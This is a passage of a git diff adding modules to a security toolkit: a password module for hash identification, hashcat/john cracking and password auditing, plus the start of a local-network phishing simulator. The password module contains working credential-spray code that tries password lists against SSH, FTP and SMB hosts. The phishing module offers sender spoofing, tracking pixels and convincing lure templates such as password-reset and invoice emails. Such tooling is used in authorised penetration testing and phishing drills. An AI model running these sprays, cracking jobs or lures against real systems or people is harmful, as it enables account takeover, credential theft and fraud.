i, s in enumerate(scans, 1): + print(f" {i}. {s['file']} ({s['host_count']} hosts)") + a = int(input(" Scan 1 #: ").strip()) - 1 + b = int(input(" Scan 2 #: ").strip()) - 1 + diff = svc.diff_scans(scans[a]['file'], scans[b]['file']) + if diff.get('ok'): + print(f"\n New hosts: {len(diff['new_hosts'])}") + for h in diff['new_hosts']: + print(f" + {h}") + print(f" Removed hosts: {len(diff['removed_hosts'])}") + for h in diff['removed_hosts']: + print(f" - {h}") + print(f" Unchanged: {len(diff['unchanged_hosts'])}") diff --git a/modules/password_toolkit.py b/modules/password_toolkit.py new file mode 100644 index 0000000..d6f966d --- /dev/null +++ b/modules/password_toolkit.py @@ -0,0 +1,796 @@ +"""AUTARCH Password Toolkit + +Hash identification, cracking (hashcat/john integration), password generation, +credential spray/stuff testing, wordlist management, and password policy auditing. +""" + +DESCRIPTION = "Password cracking & credential testing" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import string +import secrets +import hashlib +import threading +import subprocess +from pathlib import Path +from dataclasses import dataclass, field +from typing import Dict, List, Optional, Any, Tuple + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Hash Type Signatures ────────────────────────────────────────────────────── + +@dataclass +class HashSignature: + name: str + regex: str + hashcat_mode: int + john_format: str + example: str + bits: int = 0 + + +HASH_SIGNATURES: List[HashSignature] = [ + HashSignature('MD5', r'^[a-fA-F0-9]{32}$', 0, 'raw-md5', 'd41d8cd98f00b204e9800998ecf8427e', 128), + HashSignature('SHA-1', r'^[a-fA-F0-9]{40}$', 100, 'raw-sha1', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 160), + HashSignature('SHA-224', r'^[a-fA-F0-9]{56}$', 1300, 'raw-sha224', 'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f', 224), + HashSignature('SHA-256', r'^[a-fA-F0-9]{64}$', 1400, 'raw-sha256', 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 256), + HashSignature('SHA-384', r'^[a-fA-F0-9]{96}$', 10800,'raw-sha384', '38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b', 384), + HashSignature('SHA-512', r'^[a-fA-F0-9]{128}$', 1700, 'raw-sha512', 'cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e', 512), + HashSignature('NTLM', r'^[a-fA-F0-9]{32}$', 1000, 'nt', '31d6cfe0d16ae931b73c59d7e0c089c0', 128), + HashSignature('LM', r'^[a-fA-F0-9]{32}$', 3000, 'lm', 'aad3b435b51404eeaad3b435b51404ee', 128), + HashSignature('bcrypt', r'^\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}$', 3200, 'bcrypt', '$2b$12$LJ3m4ys3Lg2VBe5F.4oXzuLKmRPBRWvs5fS5K.zL1E8CfJzqS/VfO', 0), + HashSignature('scrypt', r'^\$7\$', 8900, 'scrypt', '', 0), + HashSignature('Argon2', r'^\$argon2(i|d|id)\$', 0, 'argon2', '', 0), + HashSignature('MySQL 4.1+', r'^\*[a-fA-F0-9]{40}$', 300, 'mysql-sha1', '*6C8989366EAF6BCBBAA855D6DA93DE65C96D33D9', 160), + HashSignature('SHA-512 Crypt', r'^\$6\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{86}$', 1800, 'sha512crypt', '', 0), + HashSignature('SHA-256 Crypt', r'^\$5\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{43}$', 7400, 'sha256crypt', '', 0), + HashSignature('MD5 Crypt', r'^\$1\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0), + HashSignature('DES Crypt', r'^[./A-Za-z0-9]{13}$', 1500, 'descrypt', '', 0), + HashSignature('APR1 MD5', r'^\$apr1\$', 1600, 'md5apr1', '', 0), + HashSignature('Cisco Type 5', r'^\$1\$[./A-Za-z0-9]{8}\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0), + HashSignature('Cisco Type 7', r'^[0-9]{2}[0-9A-Fa-f]+$', 0, '', '', 0), + HashSignature('PBKDF2-SHA256', r'^\$pbkdf2-sha256\$', 10900,'pbkdf2-hmac-sha256', '', 0), + HashSignature('Django SHA256', r'^pbkdf2_sha256\$', 10000,'django', '', 0), + HashSignature('CRC32', r'^[a-fA-F0-9]{8}$', 0, '', 'deadbeef', 32), +] + + +# ── Password Toolkit Service ───────────────────────────────────────────────── + +class PasswordToolkit: + """Hash identification, cracking, generation, and credential testing.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'password_toolkit') + self._wordlists_dir = os.path.join(self._data_dir, 'wordlists') + self._results_dir = os.path.join(self._data_dir, 'results') + os.makedirs(self._wordlists_dir, exist_ok=True) + os.makedirs(self._results_dir, exist_ok=True) + self._active_jobs: Dict[str, dict] = {} + + # ── Hash Identification ─────────────────────────────────────────────── + + def identify_hash(self, hash_str: str) -> List[dict]: + """Identify possible hash types for a given hash string.""" + hash_str = hash_str.strip() + matches = [] + for sig in HASH_SIGNATURES: + if re.match(sig.regex, hash_str): + matches.append({ + 'name': sig.name, + 'hashcat_mode': sig.hashcat_mode, + 'john_format': sig.john_format, + 'bits': sig.bits, + 'confidence': self._hash_confidence(hash_str, sig), + }) + # Sort by confidence + matches.sort(key=lambda m: {'high': 0, 'medium': 1, 'low': 2}.get(m['confidence'], 3)) + return matches + + def _hash_confidence(self, hash_str: str, sig: HashSignature) -> str: + """Estimate confidence of hash type match.""" + # bcrypt, scrypt, argon2, crypt formats are definitive + if sig.name in ('bcrypt', 'scrypt', 'Argon2', 'SHA-512 Crypt', + 'SHA-256 Crypt', 'MD5 Crypt', 'APR1 MD5', + 'PBKDF2-SHA256', 'Django SHA256', 'MySQL 4.1+'): + return 'high' + # Length-based can be ambiguous (MD5 vs NTLM vs LM) + if len(hash_str) == 32: + return 'medium' # Could be MD5, NTLM, or LM + if len(hash_str) == 8: + return 'low' # CRC32 vs short hex + return 'medium' + + def identify_batch(self, hashes: List[str]) -> List[dict]: + """Identify types for multiple hashes.""" + results = [] + for h in hashes: + h = h.strip() + if not h: + continue + ids = self.identify_hash(h) + results.append({'hash': h, 'types': ids}) + return results + + # ── Hash Cracking ───────────────────────────────────────────────────── + + def crack_hash(self, hash_str: str, hash_type: str = 'auto', + wordlist: str = '', attack_mode: str = 'dictionary', + rules: str = '', mask: str = '', + tool: str = 'auto') -> dict: + """Start a hash cracking job. + + attack_mode: 'dictionary', 'brute_force', 'mask', 'hybrid' + tool: 'hashcat', 'john', 'auto' (try hashcat first, then john) + """ + hash_str = hash_str.strip() + if not hash_str: + return {'ok': False, 'error': 'No hash provided'} + + # Auto-detect hash type if needed + if hash_type == 'auto': + ids = self.identify_hash(hash_str) + if not ids: + return {'ok': False, 'error': 'Could not identify hash type'} + hash_type = ids[0]['name'] + + # Find cracking tool + hashcat = find_tool('hashcat') + john = find_tool('john') + + if tool == 'auto': + tool = 'hashcat' if hashcat else ('john' if john else None) + elif tool == 'hashcat' and not hashcat: + return {'ok': False, 'error': 'hashcat not found'} + elif tool == 'john' and not john: + return {'ok': False, 'error': 'john not found'} + + if not tool: + # Fallback: Python-based dictionary attack (slow but works) + return self._python_crack(hash_str, hash_type, wordlist) + + # Default wordlist + if not wordlist: + wordlist = self._find_default_wordlist() + + job_id = f'crack_{int(time.time())}_{secrets.token_hex(4)}' + + if tool == 'hashcat': + return self._crack_hashcat(job_id, hash_str, hash_type, + wordlist, attack_mode, rules, mask) + else: + return self._crack_john(job_id, hash_str, hash_type, + wordlist, attack_mode, rules, mask) + + def _crack_hashcat(self, job_id: str, hash_str: str, hash_type: str, + wordlist: str, attack_mode: str, rules: str, + mask: str) -> dict: + """Crack using hashcat.""" + hashcat = find_tool('hashcat') + # Get hashcat mode + mode = 0 + for sig in HASH_SIGNATURES: + if sig.name == hash_type: + mode = sig.hashcat_mode + break + + # Write hash to temp file + hash_file = os.path.join(self._results_dir, f'{job_id}.hash') + out_file = os.path.join(self._results_dir, f'{job_id}.pot') + with open(hash_file, 'w') as f: + f.write(hash_str + '\n') + + cmd = [hashcat, '-m', str(mode), hash_file, '-o', out_file, '--potfile-disable'] + + attack_modes = {'dictionary': '0', 'brute_force': '3', 'mask': '3', 'hybrid': '6'} + cmd.extend(['-a', attack_modes.get(attack_mode, '0')]) + + if attack_mode in ('dictionary', 'hybrid') and wordlist: + cmd.append(wordlist) + if attack_mode in ('brute_force', 'mask') and mask: + cmd.append(mask) + elif attack_mode == 'brute_force' and not mask: + cmd.append('?a?a?a?a?a?a?a?a') # Default 8-char brute force + if rules: + cmd.extend(['-r', rules]) + + result_holder = {'result': None, 'done': False, 'process': None} + self._active_jobs[job_id] = result_holder + + def run_crack(): + try: + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600) + result_holder['process'] = None + cracked = '' + if os.path.exists(out_file): + with open(out_file, 'r') as f: + cracked = f.read().strip() + result_holder['result'] = { + 'ok': True, + 'cracked': cracked, + 'output': proc.stdout[-2000:] if proc.stdout else '', + 'returncode': proc.returncode, + } + except subprocess.TimeoutExpired: + result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'} + except Exception as e: + result_holder['result'] = {'ok': False, 'error': str(e)} + finally: + result_holder['done'] = True + + threading.Thread(target=run_crack, daemon=True).start() + return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with hashcat (mode {mode})'} + + def _crack_john(self, job_id: str, hash_str: str, hash_type: str, + wordlist: str, attack_mode: str, rules: str, + mask: str) -> dict: + """Crack using John the Ripper.""" + john = find_tool('john') + fmt = '' + for sig in HASH_SIGNATURES: + if sig.name == hash_type: + fmt = sig.john_format + break + + hash_file = os.path.join(self._results_dir, f'{job_id}.hash') + with open(hash_file, 'w') as f: + f.write(hash_str + '\n') + + cmd = [john, hash_file] + if fmt: + cmd.extend(['--format=' + fmt]) + if wordlist and attack_mode == 'dictionary': + cmd.extend(['--wordlist=' + wordlist]) + if rules: + cmd.extend(['--rules=' + rules]) + if attack_mode in ('mask', 'brute_force') and mask: + cmd.extend(['--mask=' + mask]) + + result_holder = {'result': None, 'done': False} + self._active_jobs[job_id] = result_holder + + def run_crack(): + try: + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600) + # Get cracked results + show = subprocess.run([john, '--show', hash_file], + capture_output=True, text=True, timeout=10) + result_holder['result'] = { + 'ok': True, + 'cracked': show.stdout.strip() if show.stdout else '', + 'output': proc.stdout[-2000:] if proc.stdout else '', + 'returncode': proc.returncode, + } + except subprocess.TimeoutExpired: + result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'} + except Exception as e: + result_holder['result'] = {'ok': False, 'error': str(e)} + finally: + result_holder['done'] = True + + threading.Thread(target=run_crack, daemon=True).start() + return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with john ({fmt or "auto"})'} + + def _python_crack(self, hash_str: str, hash_type: str, + wordlist: str) -> dict: + """Fallback pure-Python dictionary crack for common hash types.""" + algo_map = { + 'MD5': 'md5', 'SHA-1': 'sha1', 'SHA-256': 'sha256', + 'SHA-512': 'sha512', 'SHA-224': 'sha224', 'SHA-384': 'sha384', + } + algo = algo_map.get(hash_type) + if not algo: + return {'ok': False, 'error': f'Python cracker does not support {hash_type}. Install hashcat or john.'} + + if not wordlist: + wordlist = self._find_default_wordlist() + if not wordlist or not os.path.exists(wordlist): + return {'ok': False, 'error': 'No wordlist available'} + + hash_lower = hash_str.lower() + tried = 0 + try: + with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f: + for line in f: + word = line.strip() + if not word: + continue + h = hashlib.new(algo, word.encode('utf-8')).hexdigest() + tried += 1 + if h == hash_lower: + return { + 'ok': True, + 'cracked': f'{hash_str}:{word}', + 'plaintext': word, + 'tried': tried, + 'message': f'Cracked! Password: {word}', + } + if tried >= 10_000_000: + break + except Exception as e: + return {'ok': False, 'error': str(e)} + + return {'ok': True, 'cracked': '', 'tried': tried, + 'message': f'Not cracked. Tried {tried:,} candidates.'} + + def get_crack_status(self, job_id: str) -> dict: + """Check status of a cracking job.""" + holder = self._active_jobs.get(job_id) + if not holder: + return {'ok': False, 'error': 'Job not found'} + if not holder['done']: + return {'ok': True, 'done': False, 'message': 'Cracking in progress...'} + self._active_jobs.pop(job_id, None) + return {'ok': True, 'done': True, **holder['result']} + + # ── Password Generation ─────────────────────────────────────────────── + + def generate_password(self, length: int = 16, count: int = 1, + uppercase: bool = True, lowercase: bool = True, + digits: bool = True, symbols: bool = True, + exclude_chars: str = '', + pattern: str = '') -> List[str]: + """Generate secure random passwords.""" + if pattern: + return [self._generate_from_pattern(pattern) for _ in range(count)] + + charset = '' + if uppercase: + charset += string.ascii_uppercase + if lowercase: + charset += string.ascii_lowercase + if digits: + charset += string.digits + if symbols: + charset += '!@#$%^&*()-_=+[]{}|;:,.<>?' + if exclude_chars: + charset = ''.join(c for c in charset if c not in exclude_chars) + if not charset: + charset = string.ascii_letters + string.digits + + length = max(4, min(length, 128)) + count = max(1, min(count, 100)) + + passwords = [] + for _ in range(count): + pw = ''.join(secrets.choice(charset) for _ in range(length)) + passwords.append(pw) + return passwords + + def _generate_from_pattern(self, pattern: str) -> str: + """Generate password from pattern. + ?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol, ?a = any + """ + result = [] + i = 0 + while i < len(pattern): + if pattern[i] == '?' and i + 1 < len(pattern): + c = pattern[i + 1] + if c == 'u': + result.append(secrets.choice(string.ascii_uppercase)) + elif c == 'l': + result.append(secrets.choice(string.ascii_lowercase)) + elif c == 'd': + result.append(secrets.choice(string.digits)) + elif c == 's': + result.append(secrets.choice('!@#$%^&*()-_=+')) + elif c == 'a': + result.append(secrets.choice( + string.ascii_letters + string.digits + '!@#$%^&*')) + else: + result.append(pattern[i:i+2]) + i += 2 + else: + result.append(pattern[i]) + i += 1 + return ''.join(result) + + # ── Password Policy Audit ───────────────────────────────────────────── + + def audit_password(self, password: str) -> dict: + """Audit a password against common policies and calculate entropy.""" + import math + checks = { + 'length_8': len(password) >= 8, + 'length_12': len(password) >= 12, + 'length_16': len(password) >= 16, + 'has_uppercase': bool(re.search(r'[A-Z]', password)), + 'has_lowercase': bool(re.search(r'[a-z]', password)), + 'has_digit': bool(re.search(r'[0-9]', password)), + 'has_symbol': bool(re.search(r'[^A-Za-z0-9]', password)), + 'no_common_patterns': not self._has_common_patterns(password), + 'no_sequential': not self._has_sequential(password), + 'no_repeated': not self._has_repeated(password), + } + + # Calculate entropy + charset_size = 0 + if re.search(r'[a-z]', password): + charset_size += 26 + if re.search(r'[A-Z]', password): + charset_size += 26 + if re.search(r'[0-9]', password): + charset_size += 10 + if re.search(r'[^A-Za-z0-9]', password): + charset_size += 32 + entropy = len(password) * math.log2(charset_size) if charset_size > 0 else 0 + + # Strength rating + if entropy >= 80 and all(checks.values()): + strength = 'very_strong' + elif entropy >= 60 and checks['length_12']: + strength = 'strong' + elif entropy >= 40 and checks['length_8']: + strength = 'medium' + elif entropy >= 28: + strength = 'weak' + else: + strength = 'very_weak' + + return { + 'length': len(password), + 'entropy': round(entropy, 1), + 'strength': strength, + 'checks': checks, + 'charset_size': charset_size, + } + + def _has_common_patterns(self, pw: str) -> bool: + common = ['password', '123456', 'qwerty', 'abc123', 'letmein', + 'admin', 'welcome', 'monkey', 'dragon', 'master', + 'login', 'princess', 'football', 'shadow', 'sunshine', + 'trustno1', 'iloveyou', 'batman', 'access', 'hello'] + pl = pw.lower() + return any(c in pl for c in common) + + def _has_sequential(self, pw: str) -> bool: + for i in range(len(pw) - 2): + if (ord(pw[i]) + 1 == ord(pw[i+1]) == ord(pw[i+2]) - 1): + return True + return False + + def _has_repeated(self, pw: str) -> bool: + for i in range(len(pw) - 2): + if pw[i] == pw[i+1] == pw[i+2]: + return True + return False + + # ── Credential Spray / Stuff ────────────────────────────────────────── + + def credential_spray(self, targets: List[dict], passwords: List[str], + protocol: str = 'ssh', threads: int = 4, + delay: float = 1.0) -> dict: + """Spray passwords against target services. + + targets: [{'host': '...', 'port': 22, 'username': 'admin'}, ...] + protocol: 'ssh', 'ftp', 'smb', 'http_basic', 'http_form' + """ + if not targets or not passwords: + return {'ok': False, 'error': 'Targets and passwords required'} + + job_id = f'spray_{int(time.time())}_{secrets.token_hex(4)}' + result_holder = { + 'done': False, + 'results': [], + 'total': len(targets) * len(passwords), + 'tested': 0, + 'found': [], + } + self._active_jobs[job_id] = result_holder + + def do_spray(): + import socket as sock_mod + for target in targets: + host = target.get('host', '') + port = target.get('port', 0) + username = target.get('username', '') + for pw in passwords: + if protocol == 'ssh': + ok = self._test_ssh(host, port or 22, username, pw) + elif protocol == 'ftp': + ok = self._test_ftp(host, port or 21, username, pw) + elif protocol == 'smb': + ok = self._test_smb(host, port or 445, username, pw) + else: + ok = False + + result_holder['tested'] += 1 + if ok: + cred = {'host': host, 'port': port, 'username': username, + 'password': pw, 'protocol': protocol} + result_holder['found'].append(cred) + + time.sleep(delay) + result_holder['done'] = True + + threading.Thread(target=do_spray, daemon=True).start() + return {'ok': True, 'job_id': job_id, + 'message': f'Spray started: {len(targets)} targets × {len(passwords)} passwords'} + + def _test_ssh(self, host: str, port: int, user: str, pw: str) -> bool: + try: + import paramiko + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect(host, port=port, username=user, password=pw, + timeout=5, look_for_keys=False, allow_agent=False) + client.close() + return True + except Exception: + return False + + def _test_ftp(self, host: str, port: int, user: str, pw: str) -> bool: + try: + import ftplib + ftp = ftplib.FTP() + ftp.connect(host, port, timeout=5) + ftp.login(user, pw) + ftp.quit() + return True + except Exception: + return False + + def _test_smb(self, host: str, port: int, user: str, pw: str) -> bool: + try: + from impacket.smbconnection import SMBConnection + conn = SMBConnection(host, host, sess_port=port) + conn.login(user, pw) + conn.close() + return True + except Exception: + return False + + def get_spray_status(self, job_id: str) -> dict: + holder = self._active_jobs.get(job_id) + if not holder: + return {'ok': False, 'error': 'Job not found'} + return { + 'ok': True, + 'done': holder['done'], + 'tested': holder['tested'], + 'total': holder['total'], + 'found': holder['found'], + } + + # ── Wordlist Management ─────────────────────────────────────────────── + + def list_wordlists(self) -> List[dict]: + """List available wordlists.""" + results = [] + for f in Path(self._wordlists_dir).glob('*'): + if f.is_file(): + size = f.stat().st_size + line_count = 0 + try: + with open(f, 'r', encoding='utf-8', errors='ignore') as fh: + for _ in fh: + line_count += 1 + if line_count > 10_000_000: + break + except Exception: + pass + results.append({ + 'name': f.name, + 'path': str(f), + 'size': size, + 'size_human': self._human_size(size), + 'lines': line_count, + }) + # Also check common system locations + system_lists = [ + '/usr/share/wordlists/rockyou.txt', + '/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt', + '/usr/share/wordlists/fasttrack.txt', + ] + for path in system_lists: + if os.path.exists(path) and not any(r['path'] == path for r in results): + size = os.path.getsize(path) + results.append({ + 'name': os.path.basename(path), + 'path': path, + 'size': size, + 'size_human': self._human_size(size), + 'lines': -1, # Don't count for system lists + 'system': True, + }) + return results + + def _find_default_wordlist(self) -> str: + """Find the best available wordlist.""" + # Check our wordlists dir first + for f in Path(self._wordlists_dir).glob('*'): + if f.is_file() and f.stat().st_size > 100: + return str(f) + # System locations + candidates = [ + '/usr/share/wordlists/rockyou.txt', + '/usr/share/wordlists/fasttrack.txt', + '/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt', + ] + for c in candidates: + if os.path.exists(c): + return c + return '' + + def upload_wordlist(self, filename: str, data: bytes) -> dict: + """Save an uploaded wordlist.""" + safe_name = re.sub(r'[^a-zA-Z0-9._-]', '_', filename) + path = os.path.join(self._wordlists_dir, safe_name) + with open(path, 'wb') as f: + f.write(data) + return {'ok': True, 'path': path, 'name': safe_name} + + def delete_wordlist(self, name: str) -> dict: + path = os.path.join(self._wordlists_dir, name) + if os.path.exists(path): + os.remove(path) + return {'ok': True} + return {'ok': False, 'error': 'Wordlist not found'} + + # ── Hash Generation (for testing) ───────────────────────────────────── + + def hash_string(self, plaintext: str, algorithm: str = 'md5') -> dict: + """Hash a string with a given algorithm.""" + algo_map = { + 'md5': hashlib.md5, + 'sha1': hashlib.sha1, + 'sha224': hashlib.sha224, + 'sha256': hashlib.sha256, + 'sha384': hashlib.sha384, + 'sha512': hashlib.sha512, + } + fn = algo_map.get(algorithm.lower()) + if not fn: + return {'ok': False, 'error': f'Unsupported algorithm: {algorithm}'} + h = fn(plaintext.encode('utf-8')).hexdigest() + return {'ok': True, 'hash': h, 'algorithm': algorithm, 'plaintext': plaintext} + + # ── Tool Detection ──────────────────────────────────────────────────── + + def get_tools_status(self) -> dict: + """Check which cracking tools are available.""" + return { + 'hashcat': bool(find_tool('hashcat')), + 'john': bool(find_tool('john')), + 'hydra': bool(find_tool('hydra')), + 'ncrack': bool(find_tool('ncrack')), + } + + @staticmethod + def _human_size(size: int) -> str: + for unit in ('B', 'KB', 'MB', 'GB'): + if size < 1024: + return f'{size:.1f} {unit}' + size /= 1024 + return f'{size:.1f} TB' + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_password_toolkit() -> PasswordToolkit: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = PasswordToolkit() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Password Toolkit.""" + svc = get_password_toolkit() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ PASSWORD TOOLKIT ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — Identify Hash ║") + print("║ 2 — Crack Hash ║") + print("║ 3 — Generate Passwords ║") + print("║ 4 — Audit Password Strength ║") + print("║ 5 — Hash a String ║") + print("║ 6 — Wordlist Management ║") + print("║ 7 — Tool Status ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice == '1': + h = input(" Hash: ").strip() + if not h: + continue + results = svc.identify_hash(h) + if results: + print(f"\n Possible types ({len(results)}):") + for r in results: + print(f" [{r['confidence'].upper():6s}] {r['name']}" + f" (hashcat: {r['hashcat_mode']}, john: {r['john_format']})") + else: + print(" No matching hash types found.") + elif choice == '2': + h = input(" Hash: ").strip() + wl = input(" Wordlist (empty=default): ").strip() + result = svc.crack_hash(h, wordlist=wl) + if result.get('job_id'): + print(f" {result['message']}") + print(" Waiting...") + while True: + time.sleep(2) + s = svc.get_crack_status(result['job_id']) + if s.get('done'): + if s.get('cracked'): + print(f"\n CRACKED: {s['cracked']}") + else: + print(f"\n Not cracked. {s.get('message', '')}") + break + elif result.get('cracked'): + print(f"\n CRACKED: {result['cracked']}") + else: + print(f" {result.get('message', result.get('error', ''))}") + elif choice == '3': + length = int(input(" Length (default 16): ").strip() or '16') + count = int(input(" Count (default 5): ").strip() or '5') + passwords = svc.generate_password(length=length, count=count) + print("\n Generated passwords:") + for pw in passwords: + audit = svc.audit_password(pw) + print(f" {pw} [{audit['strength']}] {audit['entropy']} bits") + elif choice == '4': + pw = input(" Password: ").strip() + if not pw: + continue + audit = svc.audit_password(pw) + print(f"\n Strength: {audit['strength']}") + print(f" Entropy: {audit['entropy']} bits") + print(f" Length: {audit['length']}") + print(f" Charset: {audit['charset_size']} characters") + for check, passed in audit['checks'].items(): + mark = '\033[92m✓\033[0m' if passed else '\033[91m✗\033[0m' + print(f" {mark} {check}") + elif choice == '5': + text = input(" Plaintext: ").strip() + algo = input(" Algorithm (md5/sha1/sha256/sha512): ").strip() or 'sha256' + r = svc.hash_string(text, algo) + if r['ok']: + print(f" {r['algorithm']}: {r['hash']}") + else: + print(f" Error: {r['error']}") + elif choice == '6': + wls = svc.list_wordlists() + if wls: + print(f"\n Wordlists ({len(wls)}):") + for w in wls: + sys_tag = ' [system]' if w.get('system') else '' + print(f" {w['name']} — {w['size_human']}{sys_tag}") + else: + print(" No wordlists found.") + elif choice == '7': + tools = svc.get_tools_status() + print("\n Tool Status:") + for tool, available in tools.items(): + mark = '\033[92m✓\033[0m' if available else '\033[91m✗\033[0m' + print(f" {mark} {tool}") diff --git a/modules/phishmail.py b/modules/phishmail.py new file mode 100644 index 0000000..9e9254f --- /dev/null +++ b/modules/phishmail.py @@ -0,0 +1,1489 @@ +"""Gone Fishing Mail Service — Local network phishing simulator. + +Combines features from GoPhish, King Phisher, SET, and Swaks: +sender spoofing, self-signed TLS certs, HTML templates, tracking pixels, +campaign management, attachment support. + +Hard-wired to reject delivery to non-RFC1918 addresses. +""" + +DESCRIPTION = "Gone Fishing Mail Service — local network phishing simulator" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import json +import time +import uuid +import socket +import smtplib +import threading +import subprocess +import ipaddress +from pathlib import Path +from datetime import datetime +from email import encoders +from email.mime.base import MIMEBase +from email.mime.text import MIMEText +from email.mime.multipart import MIMEMultipart +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── RFC1918 networks for local-only enforcement ───────────────────────────── +_LOCAL_NETS = [ + ipaddress.ip_network('10.0.0.0/8'), + ipaddress.ip_network('172.16.0.0/12'), + ipaddress.ip_network('192.168.0.0/16'), + ipaddress.ip_network('127.0.0.0/8'), + ipaddress.ip_network('::1/128'), + ipaddress.ip_network('fe80::/10'), +] + + +def _is_local_ip(ip_str: str) -> bool: + """Check if an IP address is in RFC1918/loopback range.""" + try: + addr = ipaddress.ip_address(ip_str) + return any(addr in net for net in _LOCAL_NETS) + except ValueError: + return False + + +def _validate_local_only(address: str) -> tuple: + """Validate that a recipient's mail server resolves to a local IP. + + Returns (ok: bool, message: str). + """ + # Extract domain from email + if '@' not in address: + # Treat as hostname/IP directly + domain = address + else: + domain = address.split('@')[1] + + # Direct IP check + try: + addr = ipaddress.ip_address(domain) + if _is_local_ip(str(addr)): + return True, f"Direct IP {domain} is local" + return False, f"BLOCKED: {domain} is not a local network address" + except ValueError: + pass + + # DNS resolution + try: + results = socket.getaddrinfo(domain, 25, socket.AF_UNSPEC, socket.SOCK_STREAM) + for family, stype, proto, canonname, sockaddr in results: + ip = sockaddr[0] + if _is_local_ip(ip): + return True, f"{domain} resolves to local IP {ip}" + # Try MX records via simple DNS + ips_found = [sockaddr[0] for _, _, _, _, sockaddr in results] + return False, f"BLOCKED: {domain} resolves to external IPs: {', '.join(ips_found)}" + except socket.gaierror: + return False, f"BLOCKED: Cannot resolve {domain}" + + +# ── Template Manager ───────────────────────────────────────────────────────── + +_BUILTIN_TEMPLATES = { + "Password Reset": { + "subject": "Action Required: Password Reset", + "html": """
+
+

Security Alert

+
+

Dear {{name}},

+

We detected unusual activity on your account ({{email}}). For your security, please reset your password immediately.

+

Reset Password Now

+

If you did not request this, please ignore this email. This link expires in 24 hours.

+

— IT Security Team

+
{{tracking_pixel}}
""", + "text": "Dear {{name}},\n\nWe detected unusual activity on your account ({{email}}). Please reset your password: {{link}}\n\n— IT Security Team", + }, + "Invoice Attached": { + "subject": "Invoice #{{invoice_num}} — Payment Due", + "html": """
+
+

Invoice Notification

+
+

Hi {{name}},

+

Please find attached invoice #{{invoice_num}} for the amount of {{amount}}.

+

Payment is due by {{date}}. Please review the attached document and process the payment at your earliest convenience.

+

If you have any questions, reply to this email.

+

Best regards,
Accounts Department
{{company}}

+
{{tracking_pixel}}
""", + "text": "Hi {{name}},\n\nPlease find attached invoice #{{invoice_num}} for {{amount}}.\nPayment due: {{date}}\n\nBest regards,\nAccounts Department\n{{company}}", + }, + "Shared Document": { + "subject": "{{sender_name}} shared a document with you", + "html": """
+
+
📄
+

{{sender_name}} shared a file with you

+
+
+

{{sender_name}} ({{sender_email}}) has shared the following document:

+

{{document_name}}

+

Open Document

+

This sharing link will expire on {{date}}

+
{{tracking_pixel}}
""", + "text": "{{sender_name}} shared a document with you.\n\nDocument: {{document_name}}\nOpen: {{link}}\n\nExpires: {{date}}", + }, + "Security Alert": { + "subject": "Urgent: Suspicious Login Detected", + "html": """
+
+

⚠ Security Alert

+
+

Dear {{name}},

+

We detected a login to your account from an unrecognized device:

+ + + + + +
Location:{{location}}
Device:{{device}}
Time:{{date}}
IP Address:{{ip_address}}
+

If this was you, no action is needed. Otherwise, secure your account immediately.

+
{{tracking_pixel}}
""", + "text": "Security Alert\n\nDear {{name}},\n\nUnrecognized login detected:\nLocation: {{location}}\nDevice: {{device}}\nTime: {{date}}\nIP: {{ip_address}}\n\nSecure your account: {{link}}", + }, + "Meeting Update": { + "subject": "Meeting Update: {{meeting_title}}", + "html": """
+
+

📅 Calendar Update

+
+

Hi {{name}},

+

The following meeting has been updated:

+
+{{meeting_title}}
+{{date}} at {{time}}
+Organizer: {{organizer}} +
+

Please review the updated agenda and confirm your attendance.

+

View Meeting Details

+
{{tracking_pixel}}
